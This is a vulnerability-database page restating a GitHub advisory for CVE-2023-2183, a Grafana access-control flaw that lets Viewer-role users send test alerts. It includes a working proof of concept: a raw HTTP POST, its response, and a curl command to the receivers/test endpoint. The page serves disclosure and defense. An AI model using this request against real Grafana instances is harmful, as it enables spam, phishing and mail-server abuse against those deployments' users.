4.1

CVSS Score

3.1

-

CVSS Score

Basic Information

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

CVE-2023-2183

CVE-2023-2183: Grafana has Broken Access Control in Alert manager: Viewer can send test alerts

Summary

Grafana allows an attacker in the Viewer role, send alerts by API Alert - Test. The option is not available from the user panel UI for in the Viewer role.

Reason for the error: The API does not check access to this function and allows it by users with the least rights, for example, the Viewer that does not see this option in the user panel.

This enables malicious users to abuse the functionality by sending multiple alert messages (e-mail, slack, etc…), spamming users, prepare Phishing attack or blocked SMTP server / IP and automatically moved all message to spam folder, add to black list IP.

Details

The logged-in user, in the Viewer role, in the user panel, does not have access to the test option of sending an e-mail alert.

View of the panel for the user in the Viewer role:

Admin role - View panel for admin role:

Admin role - Next step – editing:

Admin role - Additional options:

PoC

HTTP Request by user in role Viewer

POST /api/alertmanager/grafana/config/api/v1/receivers/test HTTP/1.1
Host: xxx
Cookie: grafana_session=xxx
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://xxx/alerting/notifications/receivers/grafana-default-email/edit?alertmanager=grafana
accept: application/json, text/plain, */*
content-type: application/json
…

{"receivers":[{"name":"test","grafana_managed_receiver_configs":[{"settings":{"addresses":"<test@example.com>",
"singleEmail":true},"secureSettings":{},"type":"email","name":"test","disableResolveMessage":false}]}],
"alert":{"annotations":{"runbook_url":"http://example.com ","description":"tekst","testowy":"test http://example.com",
"more":"http://example.com "},"labels":{}}}

HTTP Response:

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/json
Expires: -1
Pragma: no-cache
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-Xss-Protection: 1; mode=block
Date: Wed, 05 Apr 2023 10:43:00 GMT
Content-Length: 471

{"alert":{"annotations":{"__value_string__":"[ metric='foo' labels={instance=bar} value=10 ]","description":"tekst",
"more":"http://example.com","runbook_url":"http://example.com","summary":"Notification test",
"testowy":"testowy http://example.com"},"labels":{"alertname":"TestAlert","instance":"Grafana"}},
"receivers":[{"name":"test","grafana_managed_receiver_configs":[{"name":"test","uid":"ojUhNFL4k","status":"ok"}]}],
"notified_at":"2023-04-05T12:43:00.1430203+02:00"}

Result:

The attacker can send as a template alert or plain/text.

Impact

As I showed above, an enabled user in the lowest role can execute an endpoint API that allows him to send an e-mail as an alert and impersonate its content. If modified accordingly, the recipient may fall victim to a Phishing attack or a targeted attack to block the SMTP server.

From a practical point of view, this means that for each "GrafanaReceiver" e.g.: Slack, E-mail, etc.. You can send any alert message from user with the least privileged.

CURL example – using a user session in the Viewer role:

curl -i -s -k -X $'POST' \
    -H $'Host: localhost:3002' -H $'Content-Length: 386' -H $'sec-ch-ua: \"Not:A-Brand\";v=\"99\", \"Chromium\";v=\"112\"' -H $'accept: application/json, text/plain, */*' -H $'content-type: application/json' -H $'x-grafana-org-id: 1' -H $'sec-ch-ua-mobile: ?0' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/527.36 (KHTML, like Gecko) Chrome/112.0.2615.50 Safari/11.36' -H $'sec-ch-ua-platform: \"macOS\"' -H $'Origin: http://localhost:3002' -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Dest: empty' -H $'Referer: http://localhost:3002/' -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8' -H $'Connection: close' \
    -b $'grafana_session=xxx' \
    --data-binary $'{\"receivers\":[{\"name\":\"test\",\"grafana_managed_receiver_configs\":[{\"settings\":{\"addresses\":\"<test@example.com>\",\"singleEmail\":true\x0d\x0a},\"secureSettings\":{},\"type\":\"email\",\"name\":\"test\",\"disableResolveMessage\":false}]}],\"alert\":{\"annotations\":{\"runbook_url\":\"http://example.com\",\"description\":\"tekst\",\"testowy\":\"testowy http://example.com\",\x0d\x0a\"more\":\"http://example.com\"\x0d\x0a},\"labels\":{}}}\x0d\x0a' \
    $'http://localhost:3002/api/alertmanager/grafana/config/api/v1/receivers/test'

Mitigation

In the SMTP server configuration settings, limit the ability to send multiple e-mails to the same e-mail address per unit of time / threshold.
Check the API for the possibility of accessing this endpoint for other roles than admin

(GitHub Advisory)

Miggo Vulnerability Database

→

CVE-2023-2183

CVE-2023-2183:

4.1

CVSS Score

3.1

-

CVSS Score

Basic Information

Technical Details

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
github.com/grafana/grafana	go	< 8.5.26	8.5.26
github.com/grafana/grafana	go	>= 9.0.0, < 9.2.19	9.2.19
github.com/grafana/grafana	go	>= 9.3.0, < 9.3.15	9.3.15
github.com/grafana/grafana	go	>= 9.4.0, < 9.4.12	9.4.12
github.com/grafana/grafana	go	>= 9.5.0, < 9.5.3	9.5.3

Technical Details

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The vulnerability stems from an API endpoint (/api/alertmanager/.../receivers/test) that lacks proper role-based access control. While the UI hides this functionality from Viewers, the corresponding API handler does not perform adequate permission validation. The function responsible for handling these test alert requests (likely RoutePostTestReceiverConfig based on Grafana's API routing patterns) is vulnerable because it doesn't enforce the required admin/editor privileges. This matches the observed behavior where Viewers can successfully POST to this endpoint despite lacking UI access to the feature.

Vulnerable functions

Only Mi**o us*rs **n s** t*is s**tion

WAF Protection Rules

WAF Rule

W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.W** rul*s *v*il**l* *or Mi**o *ustom*rs only.

Reasoning

*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.*v*il**l* *or Mi**o *ustom*rs only.

4.1

-

Basic Information

Basic Information

Concerned about an active attack path?

CVE-2023-2183: Grafana has Broken Access Control in Alert manager: Viewer can send test alerts

Summary

Details

PoC

Result:

Impact

Mitigation

CVE-2023-2183:

4.1

-

Basic Information

Basic Information

Technical Details

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

Vulnerability IntelligenceMiggo AI

Technical Details

4.1

4.1

Basic Information

Basic Information

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

CVE-2023-2183: Grafana has Broken Access Control in Alert manager: Viewer can send test alerts

Summary

Details

PoC

Result:

Impact

Mitigation

Vulnerability Intelligence
Miggo AI

Vulnerability Intelligence
Miggo AI

Vulnerability Intelligence
Miggo AI